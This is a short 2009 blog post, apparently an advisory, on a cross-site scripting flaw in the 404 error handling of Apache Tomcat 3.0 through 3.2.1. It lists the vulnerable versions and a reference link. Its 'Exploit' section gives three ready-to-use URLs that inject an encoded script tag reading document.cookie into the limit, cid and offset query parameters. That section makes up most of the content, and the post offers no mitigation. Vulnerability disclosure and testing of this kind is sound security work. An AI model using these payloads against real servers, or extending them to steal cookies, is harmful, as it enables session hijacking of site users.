Wednesday, December 2, 2009

Apache Tomcat 404 error Vulnerability

Reference: http://websecurity.com.ua/3114

Vulnerable:

Apache Software Foundation Tomcat 3.2.1
Apache Software Foundation Tomcat 3.2
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
Apache Software Foundation Tomcat 3.0

Exploit:
http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1

Reference: http://websecurity.com.ua/3114
at 7:50 AM
Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)